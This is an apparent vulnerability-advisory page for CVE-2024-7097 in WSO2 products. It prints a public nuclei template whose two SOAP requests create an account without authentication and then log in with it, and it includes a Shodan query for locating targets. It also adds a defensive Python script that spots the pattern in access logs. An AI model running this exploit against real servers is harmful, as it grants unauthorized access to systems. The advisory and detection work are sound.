CVE-2024-7097: WSO2 User Registration - Arbitrary Account Creation

Date: 2025-08-01 | Affected software: WSO2 User Registration | PoC: public

Vulnerability description

The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.

PoC code [public]

id: CVE-2024-7097

info:
  name: WSO2 User Registration - Arbitrary Account Creation
  author: iamnoooob,rootxharsh,pdresearch
  severity: medium
  description: |
    The SOAP admin service in WSO2 products has a security vulnerability that allows the creation of new user accounts regardless of the self-registration configuration settings.
  reference:
    - https://sec.vnpt.vn/2025/01/canh-bao-lo-hong-nghiem-trong-tren-nen-tang-xac-thuc-tap-trung-wso2-anh-huong-den-nhieu-co-quan-to-chuc-bo-ban-nganh/
    - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2024/WSO2-2024-3574/
  classification:
    epss-score: 0.00391
    epss-percentile: 0.59448
  metadata:
    verified: true
    max-request: 2
    shodan-query: "WSO2 Carbon Server"
  tags: cve,cve2024,wso2,intrusive,auth-bypass,vkev

variables:
  username: "{{randstr_1}}"
  password: "{{randstr_2}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /services/UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: "urn:addUser"
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
        xmlns:xsd="http://org.apache.axis2/xsd">
           <soapenv:Header/>
           <soapenv:Body>
              <xsd:addUser>
                 <xsd:user>
                    <xsd:userName>{{username}}</xsd:userName>
                    <xsd:password>{{password}}</xsd:password>
                 </xsd:user>
              </xsd:addUser>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: status
        status:
          - 202
        internal: true

  - raw:
      - |
        POST /services/AuthenticationAdmin HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
                          xmlns:aut="http://authentication.services.core.carbon.wso2.org">
           <soapenv:Header/>
           <soapenv:Body>
              <aut:login>
                 <aut:username>{{username}}</aut:username>
                 <aut:password>{{password}}</aut:password>
              </aut:login>
           </soapenv:Body>
        </soapenv:Envelope>

    matchers:
      - type: word
        words:
          - "loginResponse"
          - "<ns:return>true</ns:return>"
        condition: and
# digest: 4a0a00473045022100decbb867a0f53f5be565ad425e45a72cfb9639ddba93296163d36b51fc69038502207165b5e8a64efd5746f0384a1e5a1c73cd71c7d305e687620e4fe65097942fbb:922c64590222798bb761d5b6d8e72950
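The template above shows the two requests a scanner sends: an unauthenticated `addUser` call to `/services/UserRegistrationAdminService...` that the template treats as successful on HTTP 202, followed by a login against `/services/AuthenticationAdmin` with the new credentials. A defender can look for exactly that shape in the web-tier access logs. The following Python script is an added example for this page, not part of the nuclei template or of any WSO2 tooling; it assumes Apache/Tomcat combined log format, uses a hypothetical allowlist of networks permitted to reach admin SOAP services, and runs over constructed sample lines rather than real captures.

```python
"""Flag access-log entries that hit the WSO2 UserRegistrationAdminService
SOAP endpoint associated with CVE-2024-7097, plus any admin SOAP service
reached from outside an allowlisted network.

Added example for this page (not the nuclei template, not WSO2 code).
Assumes Apache/Tomcat "combined" access-log format. The sample lines at
the bottom are constructed, not captured from a real system.
"""

import ipaddress
import re
from dataclasses import dataclass
from typing import Iterable, List

# Combined format: ip ident user [ts] "METHOD path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Endpoint used by the PoC's first request (service name taken from the template).
REG_SERVICE_RE = re.compile(r'/services/UserRegistrationAdminService', re.IGNORECASE)
# Broader net: any Carbon admin SOAP service under /services/ (assumption: this
# naming convention holds for the deployment; tune as needed).
ADMIN_SERVICE_RE = re.compile(r'/services/\w*Admin\w*', re.IGNORECASE)

# Hypothetical allowlist: networks from which admin services may legitimately be called.
ALLOWED_ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]


@dataclass
class Finding:
    ip: str
    path: str
    status: int
    reason: str


def _allowed(ip: str) -> bool:
    """True if the source address is inside one of the allowlisted networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False  # unparsable source: treat as not allowed
    return any(addr in net for net in ALLOWED_ADMIN_NETS)


def scan(lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per suspicious request, in log order."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, method, path = m["ip"], m["method"], m["path"]
        status = int(m["status"])
        if method == "POST" and REG_SERVICE_RE.search(path):
            # 202 is the status the template's first matcher treats as success
            reason = "addUser accepted" if status == 202 else "registration service hit"
            findings.append(Finding(ip, path, status, reason))
        elif ADMIN_SERVICE_RE.search(path) and not _allowed(ip):
            findings.append(Finding(ip, path, status,
                                    "admin service from non-allowlisted source"))
    return findings


# Constructed sample log: an external host creating a user and logging in,
# an internal host logging in, and an unrelated GET.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Aug/2025:10:00:01 +0000] "POST /services/'
    'UserRegistrationAdminService.UserRegistrationAdminServiceHttpsSoap11Endpoint/ '
    'HTTP/1.1" 202 0 "-" "curl/8.0"',
    '203.0.113.7 - - [01/Aug/2025:10:00:02 +0000] "POST /services/AuthenticationAdmin '
    'HTTP/1.1" 200 512 "-" "curl/8.0"',
    '10.1.2.3 - - [01/Aug/2025:10:00:03 +0000] "POST /services/AuthenticationAdmin '
    'HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [01/Aug/2025:10:00:04 +0000] "GET /carbon/admin/login.jsp '
    'HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip} {f.status} {f.path} -> {f.reason}")
```

The ordering of the two checks matters: the registration service also matches the generic admin pattern, so it is tested first to get the more specific reason. An `addUser` that returns 202 followed within seconds by a successful `AuthenticationAdmin` login from the same source, as in the first two sample lines, is the sequence the template relies on and is worth correlating on in a SIEM rather than alerting on each line in isolation.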